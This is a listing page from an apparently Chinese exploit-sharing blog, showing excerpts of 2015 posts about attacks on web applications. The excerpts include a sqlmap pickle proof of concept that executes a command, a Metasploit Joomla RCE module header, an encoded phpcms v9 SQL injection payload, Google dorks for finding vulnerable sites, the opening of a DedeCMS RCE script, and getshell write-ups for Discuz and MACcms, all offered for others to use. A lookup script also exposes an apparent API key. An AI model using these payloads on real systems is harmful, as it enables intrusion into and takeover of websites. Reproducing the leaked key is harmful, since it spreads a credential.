• sqlmap代码执行漏洞

    sqlmap代码执行漏洞
    这个漏洞今天在微博上传的比较火。。。。。 下面给出相关POC sqlmap.py -u "http://www.ihonker.org/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg==" base64解码 csubprocessPopenp1(S'calc.exe'p2tp3Rp4. 视频 http://video.weibo.com/player/1034:4cbd333b0bf3af1de46ea99660b9a8b5/v.swf
    作者:unhonker| 发布:2015年12月09日 | 分类:漏洞公布 | 阅读:2,599次| 标签:
  • Joomla SQL注入和远程代码执行漏洞

    Joomla SQL注入和远程代码执行漏洞
    发布日期:2015.11.21 通杀版本:3.2——3.4.4 CVE-2015-7297 CVE-2015-7857 CVE-2015-7858 相关Exp见代码 ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote   Rank = ExcellentRanking     inc...
    作者:unhonker| 发布:2015年11月21日 | 分类:漏洞公布 | 阅读:4,371次| 标签:,
  • DZ 6.x getshell [20151117]

    DZ 6.x getshell [20151117]
    网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。 ps:需要或者感觉不错的请挥挥你的小手 点击 “顶” 注意三个地...
    作者:unhonker| 发布:2015年11月17日 | 分类:漏洞公布 | 阅读:4,001次| 标签:
  • DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)

    DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)
    作者:′雨。 首先来看一下 function XSSClean($val) {[/align]     global $cfg_soft_lang;      if($cfg_soft_lang=='gb2312') gb2utf8($val);      if (is_array($val))      {          while (list($key) = each($val))          {              if(in_array($key,array('tags','body','dede_fields','dede_addonfields','dopost','introduce'))) continue;     ...
    作者:unhonker| 发布:2015年10月10日 | 分类:漏洞公布 | 阅读:5,379次| 标签:
  • MACcms通杀型后台拿shell

    MACcms通杀型后台拿shell
    90sec@Joseph 此漏洞的缘由是来自论坛的一哥们求助拿shell才无奈的去审计 看见这个模块编辑就总感觉有漏洞存在当然这里并没有想象的那么简单,咱们之前遇到的模版编辑漏洞已经在这个版本修复了 漏洞文件: elseif($method=='save') {     $path = be('post','path'); $path = str_replace('\\','/',$path);     $file =  be('post','file'); $file = str_replace('\\',...
    作者:unhonker| 发布:2015年9月17日 | 分类:漏洞公布 | 阅读:9,323次| 标签:
  • 旁注查询脚本(python)

    旁注查询脚本(python)
    # coding=utf-8 #author: 小续/Joseph       import urllib import urllib2 import base64 import re import sys #填写供可以使用的key AccountKey='OP8/b5S8imIbXfU1yOYpLbL7tcEgjJ/RJAJjJkTcrJo' top=1000 skip=0 format='json' def BingSearch(query):     payload={}     payload['$top']=top     payload['$skip']=skip     payload['$format']=...
    作者:unhonker| 发布:2015年8月22日 | 分类:技术文章 | 阅读:3,462次|
  • Meinestadt24注入漏洞

    Meinestadt24注入漏洞
    [-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]   Exploit Title : Meinestadt24 SQL Injection Vulnerability   Exploit Author : Ashiyane Digital Security Team   Google Dork One : intext:© 2015 meinestadt24 Google Dork Two : inurl:nachrichten.php?artikel_id=   Date : 2015-7-25   Tested On : Windows Se7en   [-...
    作者:unhonker| 发布:2015年7月27日 | 分类:漏洞公布 | 阅读:4,710次| 标签:
  • phpcms v9最新高危sql注入exp

    phpcms v9最新高危sql注入exp
    获取当前数据库 http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=login post: forward=http%253A%252F%252F192.168.1.139%253A8080%252Fphpcms%252Findex.php%253Fm%253Dmember&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%...
    作者:unhonker| 发布:2015年7月24日 | 分类:漏洞公布 | 阅读:15,616次| 标签:
  • dedecms远程代码执行利用脚本

    dedecms远程代码执行利用脚本
    转自90sec@Joseph #! /usr/bin/env python #coding=utf-8 #Joseph(小续)   import requests import sys import re def main():     try:         url="http://"+sys.argv[1].strip('http://')     except IndexError:         print '''         poc: dede.py [url]http://www.baidu.com/[/url]         '''     payload="/install/index.ph...
    作者:unhonker| 发布:2015年7月23日 | 分类:漏洞公布 | 阅读:5,840次| 标签: